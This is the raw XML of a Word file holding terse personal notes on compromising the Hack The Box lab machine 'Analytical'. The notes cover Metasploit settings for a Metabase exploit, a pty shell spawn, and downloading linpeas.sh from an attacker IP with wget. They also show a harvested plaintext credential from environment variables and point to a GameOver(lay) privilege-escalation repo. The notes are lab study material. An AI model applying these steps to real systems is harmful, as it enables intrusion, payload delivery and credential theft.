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2C46" w14:textId="16D18CF6" w:rsidR="00C36672" w:rsidRDefault="00762FF8">
      <w:r>
        <w:t>Vim /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00196607" w14:textId="3109D23C" w:rsidR="00762FF8" w:rsidRDefault="00762FF8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Analitycal.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30541385" w14:textId="05703ACD" w:rsidR="00D91D92" w:rsidRDefault="00D91D92" w:rsidP="00D91D92">
      <w:r>
        <w:t>Data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91D92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Analitycal.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C47CBB1" w14:textId="6F2DD7E6" w:rsidR="003F097F" w:rsidRDefault="003F097F">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metabse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CC07888" w14:textId="32E653CD" w:rsidR="003F607A" w:rsidRDefault="003F607A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929BE12" w14:textId="610F32F5" w:rsidR="003F607A" w:rsidRDefault="003F607A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22C868" w14:textId="5E3C23AC" w:rsidR="003F607A" w:rsidRDefault="003F607A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="001F4655" w:rsidRPr="002B7584">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://data.analytical.htb/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="648EB7BE" w14:textId="386158F4" w:rsidR="001F4655" w:rsidRDefault="00534AB6">
      <w:r>
        <w:t xml:space="preserve">Python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E675B" w14:textId="170154BA" w:rsidR="00440998" w:rsidRDefault="00440998">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Linpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B47CA5">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B47CA5">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D926F8F" w14:textId="5D664EF8" w:rsidR="00440998" w:rsidRDefault="00440998">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B47CA5">
        <w:t xml:space="preserve">  windows vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D393E0" w14:textId="7485E934" w:rsidR="00440998" w:rsidRDefault="00440998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40998">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00E2047A" w:rsidRPr="00440998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https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B525541" w14:textId="78D7F073" w:rsidR="00E2047A" w:rsidRDefault="00E2047A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0F3070C7" w14:textId="1B795D01" w:rsidR="00E2047A" w:rsidRDefault="00E2047A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python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httpserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19F19E0C" w14:textId="5E0A8A42" w:rsidR="00E2047A" w:rsidRDefault="00E2047A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>download in /home/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metabse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5566E9EE" w14:textId="64B6E627" w:rsidR="002B47C4" w:rsidRDefault="002B47C4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</w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B47C4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>10.10.14.147</w:t>
      </w:r>
      <w:r w:rsidRPr="002B47C4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:8004/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A85BE1" w14:textId="70D9AE49" w:rsidR="00B120ED" w:rsidRDefault="00B120ED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1E899E1E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PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083B320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MB_DB_PASS=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B9E60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MB_JETTY_HOST=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77BB37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META_PASS=An4lytics_ds20223#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78560E02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LANG=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18646B8C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MB_LDAP_PASSWORD=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7EA769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HISTSIZE=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E940E9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SHELL=/bin/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="476BF559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MB_EMAIL_SMTP_USERNAME=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B034D8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MB_DB_USER=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E81051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META_USER=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metalytics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06C6E911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LC_ALL=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7EB66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JAVA_HOME=/opt/java/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openjdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="373E60B4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PWD=/home/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metabase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F109927" w14:textId="77777777" w:rsidR="00B120ED" w:rsidRP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HISTFILE=/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0027C5" w14:textId="6AD05D1C" w:rsidR="00B120ED" w:rsidRDefault="00B120ED" w:rsidP="00B12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MB_DB_FILE=//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metabase.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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B120ED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>metabase.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76AC149E" w14:textId="608BFFAA" w:rsidR="00E2047A" w:rsidRDefault="00E2047A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75DC03EE" w14:textId="148FC63D" w:rsidR="00DD4A66" w:rsidRDefault="00DD4A66" w:rsidP="00440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14:paraId="3C67B356" w14:textId="77777777" w:rsidR="00DD4A66" w:rsidRDefault="00DD4A66" w:rsidP="00DD4A66">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink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"https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157BB16" w14:textId="77777777" w:rsidR="00DD4A66" w:rsidRDefault="00DD4A66" w:rsidP="00DD4A66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="270" w:beforeAutospacing="0" w:after="45" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="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GameOver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(lay) Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4C08A" w14:textId="4DB13AD2" w:rsidR="00DD4A66" w:rsidRPr="00440998" w:rsidRDefault="00DD4A66" w:rsidP="00DD4A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>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="662E8773" w14:textId="77777777" w:rsidR="003F607A" w:rsidRDefault="003F607A"/>
    <w:sectPr w:rsidR="003F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68"/>
    <w:rsid w:val="001F4655"/>
    <w:rsid w:val="00276B68"/>
    <w:rsid w:val="002B47C4"/>
    <w:rsid w:val="003F097F"/>
    <w:rsid w:val="003F607A"/>
    <w:rsid w:val="00440998"/>
    <w:rsid w:val="00534AB6"/>
    <w:rsid w:val="00762FF8"/>
    <w:rsid w:val="00B120ED"/>
    <w:rsid w:val="00B47CA5"/>
    <w:rsid w:val="00C36672"/>
    <w:rsid w:val="00D91D92"/>
    <w:rsid w:val="00DD4A66"/>
    <w:rsid w:val="00E2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1F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{927AA2B9-3BB0-4E30-AC12-0EAD43DA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6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99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4A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rlospolop/PEASS-ng/releases/latest/download/linpeas.sh" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://data.analytical.ht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2023-12-13T16:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T15:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>